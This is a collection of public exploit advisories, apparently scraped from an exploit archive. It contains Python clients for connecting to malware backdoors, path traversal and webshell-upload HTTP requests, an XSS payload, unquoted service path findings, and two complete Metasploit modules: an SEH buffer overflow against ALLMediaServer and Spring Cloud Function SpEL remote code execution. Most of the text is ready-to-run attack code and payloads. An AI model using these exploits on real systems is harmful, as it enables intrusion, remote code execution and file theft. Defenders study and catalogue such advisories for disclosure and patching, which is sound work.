<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/a6437375fff871dff97dc91c8fd6259f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Jokerdoor<br />Vulnerability: Weak Hardcoded Credentials<br />Family: Jokerdoor<br />Type: PE32<br />MD5: a6437375fff871dff97dc91c8fd6259f<br />Vuln ID: MVID-2022-0531<br />Dropped files: Random name "awup.exe"<br />Disclosure: 04/02/2022<br />Description: The malware listens on TCP port 27374. The password "mathiasJ" is weak and hardcoded in the PE file. Failed authentication generates a "POPUP incorrect password..." message, using TELNET results in an error "PWDPerror reading password..." Using Nc64.exe utility results in a trailing line feed character "\n" after the supplied password. This causes the cmp statement check to fail even if the password is correct due to the "\n" character.<br /><br />004BDA0C | 8B 45 EC | mov eax,dword ptr ss:[ebp-14] | [ebp-14]:" mathiasJ\n"<br />004BDA0F | 8B 15 0C AC 4D 00 | mov edx,dword ptr ds:[4DAC0C] | 004DAC0C:&"mathiasJ"<br />004041C7 | 39 D0 | cmp eax,edx | eax" mathiasJ\n", edx"mathiasJ"<br /><br />So we will need to write a custom client ourselves. The password must also be sent with no space and prefixed with "PWD" E.g. "PWDmathiasJ". Upon successful authentication we get a message e.g. "PWDconnected time, date Legends 2.1". <br /><br />Exploit/PoC:<br />from socket import *<br />import time<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=27374<br /><br />def chk_res(s):<br /> res=""<br /> while True:<br /> res += s.recv(512)<br /> break<br /> if "\0" in res or "\n" in res or res == "":<br /> break<br /> return res<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /> time.sleep(1)<br /> <br /> PAYLOAD="PWDmathiasJ"<br /> s.send(PAYLOAD)<br /><br /> time.sleep(1)<br /> print(chk_res(s))<br /> s.close()<br /><br />if __name__=="__main__":<br /> doit()<br /> print("Malvuln")<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>*I. SUMMARY*<br />Title: [CVE-2022-2623] Barco Control Room Management Suite File Path<br />Traversal Vulnerability<br />Product: Barco Control Room Management Suite before 2.9 build 0275 and all<br />prior versions<br />Vulnerability Type: File Path Traversal<br />Credit by/Researcher: Murat Aydemir from Accenture Cyber Security Team<br />(Prague CFC)<br />Contact: https://twitter.com/mrtydmr75<br />Github: https://github.com/murataydemir<br /><br />*II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES*<br />CVE Number: CVE-2022-26233<br />CVSSv3: Base score: 7.5 Impact 3.6 Exploitability: 3.9<br />CVSSv3 Vector: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)<br />Vulnerability Type: File Path Traversal<br />CWE ID: CWE-22 Improper Limitation of a Pathname to a Restricted Directory<br />('Path Traversal')<br /><br />*III. PROOF OF CONCEPT (POC) FOR CVE-2022-26233*<br />Due to lack of input sanitizing inputs which come from url, an application<br />is vulnerable to file path traversal vulnerability. A succesfully<br />exploitation of this vulnerability could lead to access/read files and<br />directories stored on file system including application source code or<br />configuration and critical system files. No authentication is required to<br />exploit this vulnerability. An attacker who is not logged into the<br />application can easily exploit this vulnerability.<br /><br />GET /..\..\..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts<br />HTTP/1.1<br />Host: vulnerablehost<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0)<br />Gecko/20100101 Firefox/81.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br /><br />[image: file-path-traversal.PNG]<br /><br />*IV. REFERENCE(S)*<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26233<br />https://nvd.nist.gov/vuln/detail/CVE-2022-26233<br />https://www.barco.com/en/support/knowledge-base/kb115*XX*<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/867c6b432ccd4aa51adc5e2722a4b144.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.h<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware runs with SYSTEM integrity and listens on TCP port 7614. Third-party adversaries who can reach an infected host can run commands made available by the backdoor.<br />Family: Wollf<br />Type: PE32<br />MD5: 867c6b432ccd4aa51adc5e2722a4b144<br />Vuln ID: MVID-2022-0530<br />Dropped files: wrm.exe<br />Disclosure: 04/02/2022<br /><br />Exploit/PoC:<br />c:\>nc64.exe x.x.x.x 7614<br />"Wollf Remote Manager" v1.6<br />Code by wollf, http://www.xfocus.org<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#help<br /><br />DOS Switch to MS-DOS prompt<br />DIR/LS/LIST Directory and file list<br />CD Entry directory<br />MD/MKDIR Make directory<br />PWD Get current dirctory<br />COPY/CP Copy file<br />DEL/RM Delete directory/file<br />REN/RENAME Rename file<br />MOVE/MV Move file<br />TYPE/CAT Type text file<br /><br />POPMSG Popup message box<br />SYSINFO Get system information<br />WHO/W Get current connections<br /><br />SHELL Execute command by system shell(cmd.exe)<br />EXEC/RUN Execute file by windows API(WinExec)<br />WS Windows list<br />PS Process list<br />KILL Kill process<br /><br />GET/GETFILE Download file from remote machine<br />PUT/PUTFILE Upload file to remote machine<br />WGET Get file from web server<br />FGET Get file from ftp server<br />FPUT Put file to ftp server<br />TELNET Connect to other host<br /><br />FTPD Start ftp service<br />TELNETD/TELD/EXPORT Start telnet service (export shell)<br /><br />REDIR Redirect tcp data from <Port> to <Dest_host:Dest_port><br />REDIR_STOP Stop redirect tcp data<br />SNIFF Sniff ftp/smtp/pop3/http password what via ethernet<br />SNIFF_STOP Stop ethernet sniffer<br />KEYLOG Start keyboard record<br />KEYLOG_STOP Stop keyboard record<br /><br />REBOOT Reboot windows<br />SHUTDOWN Shutdown windows<br />EXIT Close current connection<br />QUIT Close all connection and abort service<br />REMOVE Remove service<br />VER/VERSION Version information<br />HELP/H/? Show help message<br /><br />Type "HELP | MORE" for multipage display.<br /><br />Command "HELP" succeed.<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Sherpa Connector Service (v2020.2.20328.2050) - Unquoted Service Path<br /># Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid)<br /># Version: 2020.2.20328.2050<br /># Date: 02/04/2022<br /># Vendor Homepage: http://gimmal.com/<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on: Windows 10<br /># CVE: CVE-2022-23909<br /><br /><br /># Step to discover Unquoted Service Path:<br /><br /><br />C:\>wmic service get name,displayname,pathname,startmode | findstr /i "sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />Sherpa Connector Service Sherpa Connector Service C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe Auto<br /><br /><br />C:\>sc qc "Sherpa Connector Service"<br /><br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: Sherpa Connector Service<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Sherpa Connector Service<br /> DEPENDENCIES : wmiApSrv<br /> SERVICE_START_NAME : LocalSystem<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /># Author: Hejap Zairy<br /># Date: 1.08.2022<br /># Exploit Prof<br /># Proof and Exploit:<br />#image:https://i.imgur.com/yLrRR2t.png<br />#video:https://streamable.com/x4i50c<br /><br /><br /><br />require 'msf/core'<br /> <br />class Metasploit4 < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> <br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::Seh<br /> <br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'ALLMediaServer 1.6 Buffer Overflow',<br /> 'Description' => %q{<br /> This module exploits a stack buffer overflow in ALLMediaServer 1.6<br /> The vulnerability is caused due to a boundary error within the<br /> handling of HTTP request.<br /> Thank you Saud Alenazi and 0xSaudi <br /> and Muhammad Al Ahmadi and all the friends in Tuwaiq i Love Tuwaiq<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' =><br /> [<br /> 'Hejap Zairy Al-Sharif', # Remote exploit and Metasploit module<br /> ],<br /> 'DefaultOptions' =><br /> {<br /> 'ExitFunction' => 'process', #none/process/thread/seh<br /> },<br /> 'Platform' => 'win',<br /> 'Payload' =><br /> {<br /> 'BadChars' => '\x00\x0a\x0d\xff' <br /> },<br /> <br /> 'Targets' =><br /> [<br /> [ 'ALLMediaServer 1.6 / Windows 10 - English',<br /> {<br /> 'Ret' => 0x0040590B, # POP ESI # POP EBX # RET <br /> 'Offset' => 1072<br /> }<br /> ],<br /> [ 'ALLMediaServer 1.6 / Windows XP SP3 - English',<br /> {<br /> 'Ret' => 0x0040590B, # POP ESI # POP EBX # RET <br /> 'Offset' => 1072<br /> }<br /> ],<br /> [ 'ALLMediaServer 1.6 / Windows 7 SP1 - English',<br /> {<br /> 'Ret' => 0x0040590B, # POP ESI # POP EBX # RET <br /> 'Offset' => 1072<br /> }<br /> ],<br /> ],<br /> 'Privileged' => false,<br /> 'DisclosureDate' => 'Apr 1 2022',<br /> 'DefaultTarget' => 1))<br /> <br /> register_options([Opt::RPORT(888)], self.class)<br /> <br /> end<br /> <br /> def exploit<br /> connect<br /> buffer = ""<br /> buffer << make_nops(target['Offset'])<br /> buffer << "\xeb\x06\x90\x90"<br /> buffer << "\x0B\x59\x40\x00"<br /> buffer << make_nops(100)<br /> buffer << payload.encoded<br /> buffer << make_nops(50)<br /> print_status("Sending payload ... \n Exploit MediaServer")<br /> sock.put(buffer)<br /> handler<br /> disconnect<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin uleak-security-dashboard 1.2.3 - Stored Cross-Site Scripting (Authenticated)<br /># Date: 31-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/uleak-security-dashboard/ <https://wordpress.org/plugins/amministrazione-aperta/><br /># Version: 1.2.3<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br /># Vulnerable Code:<br /><br />```<br /><th scope="row"><label>ULeak API Key*: </label></th><br /><td><input type="text" name="ul_apikey" placeholder="XXXXXXXXXXX"<br />value="'.$user['apikey'].'"><span class="description">(Insert your ULeak<br />API Key. Find your Credentials in your profil settings <a target="_blank"<br />href="https://uleak.de/profil">here</a>)</span></td><br />```<br /><br /># POC<br /><br />1) Install uleak-security-dashboard WordPress Plugin<br />2) Naviagete to http://localhost/wp-admin/tools.php?page=uleak<br />3) Inject payload ```"><script>alert(1)</script>```<br />in *ULeak API Key*: *filed.<br />4) XSS will trigger.<br /><br /># POC Image<br /><br />https://prnt.sc/D7sq6IlNtNaf<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Spring Cloud Function SpEL Injection',<br /> 'Description' => %q{<br /> Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using<br /> an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting<br /> the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code<br /> execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.<br /> },<br /> 'Author' => [<br /> 'm09u3r', # vulnerability discovery<br /> 'hktalent', # github PoC<br /> 'Spencer McIntyre'<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-22963'],<br /> ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'],<br /> ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'],<br /> ['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225']<br /> ],<br /> 'DisclosureDate' => '2022-03-29',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8080,<br /> 'TARGETURI' => '/functionRouter'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'])<br /> )<br /><br /> return CheckCode::Unknown unless res<br /><br /> # both vulnerable and patched servers respond with 500 and a JSON body with these keys<br /> return CheckCode::Safe unless res.code == 500<br /> return CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set)<br /><br /> # best we can do is detect that the service is running<br /> CheckCode::Detected<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> vprint_status("Executing command: #{cmd}")<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> 'headers' => {<br /> 'spring.cloud.function.routing-expression' => "T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub("'", "''")}'})"<br /> }<br /> )<br /><br /> fail_with(Failure::Unreachable, 'Connection failed') if res.nil?<br /> fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500<br /> end<br />end<br /></code></pre>
<pre><code>===============================================================================<br /> title: IdeaRE RefTree Download Path Traversal<br /> product: IdeaRE RefTree < 2021.09.17<br /> vulnerability type: Directory Traversal<br /> CVE ID: CVE-2022-27248<br /> severity: Medium<br /> CVSSv3 score: 4.3<br /> CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N<br /> found: 2021-09-13<br /> by: Savino Sisco <saviosisco@gmail.com><br />===============================================================================<br /><br />[EXECUTIVE SUMMARY]<br />RefTree is a web application made for managing complex real estate situations.<br />Among other features, it offers the possibility for authenticated users<br />to upload and download DWG (CAD drawings) files for buildings.<br /><br />During a penetration test activity, a "Directory Traversal" vulnerability<br />was found on the download feature which allows to download arbitrary files<br />with the "dwg" extension. The application actually checks that the filename<br />ends with "dwg", so it's not possible to download files with other extensions.<br /><br />This vulnerability may also allow to steal NTLM hashes of the host system<br />by supplying, as the download path, a UNC path pointing to an <br />attacker controlled machine running a tool like Responder.<br /><br />[VULNERABLE VERSIONS]<br />IdeaRE RefTree < 2021.09.17<br /><br />[TECHNICAL DETAILS]<br />It is possible to reproduce the issue following these steps:<br />1. Log into the application to get a valid session cookie<br />2. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/DownloadDwg'<br /> to download an arbitrary "dwg" file (UNC paths are accepted).<br /><br /><br />Example of the request to the Download endpoint:<br /><br />POST /CaddemServiceJS/CaddemService.svc/rest/DownloadDwg HTTP/2<br />Host: [REDACTED]<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/json<br />Content-Length: 111<br />Origin: https://[REDACTED]<br />Referer: https://[REDACTED]/Reftreespace/<br />Cookie: ASP.NET_SessionId=dezu5r0zswyqk4dukwt5jt5n<br /><br />{<br /> "path": "C:\\Users\\Public\\test.dwg"<br />}<br /><br /><br />HTTP/2 200 OK<br />Cache-Control: private<br />Content-Type: application/json; charset=utf-8<br />Server: Microsoft-IIS/10.0<br />Access-Control-Allow-Credentials: true<br />Access-Control-Allow-Origin: https://[REDACTED]<br />X-Powered-By: ASP.NET<br />Date: Thu, 10 Oct 2021 11:21:32 GMT<br />Content-Length: 241916<br /><br />{"DownloadDwgResult":[BASE64_FILE_REDACTED]}<br /><br /><br />[VULNERABILITY REFERENCE]<br />The following CVE ID was allocated to track the vulnerabilities:<br />CVE-2022-27248<br /><br /><br />[DISCLOSURE TIMELINE]<br />2021-09-13 Vulnerability disclosed to our customer and the vendor.<br /> Vendor acknowledged the issue.<br />2021-09-17 Vendor released a fix for the software.<br />2021-10-15 The vulnerability was rechecked in the newer version to confirm <br /> that is was indeed fixed.<br />2022-03-15 Researcher requested to publicly disclose the issue; public<br /> coordinated disclosure.<br /><br />[RESOLUTION]<br />Update the software to a version >= 2021.09.17<br /><br />[CONTACT DETAILS]<br />Savino Sisco <saviosisco@gmail.com><br />https://www.linkedin.com/in/savino-sisco/<br /></code></pre>
<pre><code>===============================================================================<br /> title: IdeaRE RefTree Remote Code Execution<br /> product: IdeaRE RefTree < 2021.09.17<br /> vulnerability type: Unrestricted File Upload<br /> CVE ID: CVE-2022-27249<br /> severity: High<br /> CVSSv3 score: 8.8<br /> CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br /> found: 2021-09-13<br /> by: Savino Sisco saviosisco@gmail.com<br />===============================================================================<br /><br />[EXECUTIVE SUMMARY]<br />RefTree is a web application made for managing complex real estate situations.<br />Among other features, it offers the possibility for authenticated users<br />to upload and download DWG (CAD drawings) files for buildings.<br /><br />During a penetration test activity, an "Unrestricted File Upload" vulnerability<br />was found which leverages the upload feature to upload a file anywhere on the <br />target system.<br /><br />By uploading a malicious web page, like an aspx web shell, to the server's<br />web root it is possible to achive code execution by just navigating to the<br />malicious page with a web browser.<br /><br />[VULNERABLE VERSIONS]<br />IdeaRE RefTree < 2021.09.17<br /><br />[TECHNICAL DETAILS]<br />It is possible to reproduce the issue following these steps:<br />1. Log into the application to get a valid session cookie<br />2. Get a valid "ObjId" from the application (the ID of a building to associate<br /> the file to)<br />3. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/UploadDwg'<br /> to upload a file on the target system, for example a web shell in the<br /> server's web root<br />4. Navigate to the new page with a web browser to trigger code execution<br /><br /><br />Example of the HTTP request to the Upload endpoint:<br /><br />POST /CaddemServiceJS/CaddemService.svc/rest/UploadDwg HTTP/2<br />Host: [REDACTED]<br />Cookie: ASP.NET_SessionId=b1125gke23enpul1ukeu1ouy<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/json<br />Content-Length: 2211<br />Origin: https://[REDACTED]<br />Referer: https://[REDACTED]/Reftreespace/<br /><br />{<br /> "FileContent": "[BASE64_PAYLOAD]",<br /> "DwgName": "C:\\inetpub\\wwwroot\\webshell.aspx",<br /> "UploadType": "WorkingCopy",<br /> "ObjId": 4774726,<br /> "ObjType": 5,<br /> "UpdateState": true,<br /> "DwgOp": 23<br />}<br /><br /><br />HTTP/2 200 OK<br />Cache-Control: private<br />Content-Type: application/json; charset=utf-8<br />Server: Microsoft-IIS/10.0<br />Access-Control-Allow-Credentials: true<br />Access-Control-Allow-Origin: [REDACTED]<br />X-Powered-By: ASP.NET<br />Date: Fri, 10 Sep 2021 15:00:53 GMT<br />Content-Length: 24<br /><br />{"UploadDwgResult":null}<br /><br /><br />[VULNERABILITY REFERENCE]<br />The following CVE ID was allocated to track the vulnerabilities:<br />CVE-2022-27249<br /><br /><br />[DISCLOSURE TIMELINE]<br />2021-09-13 Vulnerability disclosed to our customer and the vendor.<br /> Vendor acknowledged the issue.<br />2021-09-17 Vendor released a fix for the software.<br />2021-10-15 The vulnerability was rechecked in the newer version to confirm <br /> that is was indeed fixed.<br />2022-03-15 Researcher requested to publicly disclose the issue; public<br /> coordinated disclosure.<br /><br />[RESOLUTION]<br />Update the software to a version >= 2021.09.17<br /><br />Savino Sisco <saviosisco@gmail.com><br />https://www.linkedin.com/in/savino-sisco/<br /></code></pre>
<pre><code># Exploit Title: EG Free AntiVirus v2020 - Unquoted Service Path (Local Privilege Escalation)<br /># Date: 24/01/2022<br /># Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)<br /># Vendor Homepage: http://www.egsoftweb.in/index.aspx<br /># Software Link: http://www.egsoftweb.in/OurProduct_Readmore.aspx?id=6<br /># Version: 2020<br /># Tested: Windows 10 (x64)<br /># CVE: CVE-2021-46439<br /><br />-------------<br />Description:<br />-------------<br /><br />EG Free AntiVirus (v2020) installs a service (WinSEGAV AutoConfig) with<br />an unquoted service path. Since this service is running as SYSTEM, it<br />creates a local privilege escalation vulnerability. To properly exploit<br />this vulnerability, a local attacker must insert an executable in the<br />path of the service. Rebooting the system or restarting the service<br />will run the malicious executable with elevated privileges.<br /><br />------------------<br />Proof of Concept:<br />------------------<br /><br />C:\Users\shah>sc qc “WinSEGAV AutoConfig”<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: WinSEGAV AutoConfig<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files\EGSoftWeb\EG Anti<br />Virus\egavser.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Windows Service For EG Free AntiVirus<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />Best regards,<br />Shahrukh Iqbal Mirza. <br /></code></pre>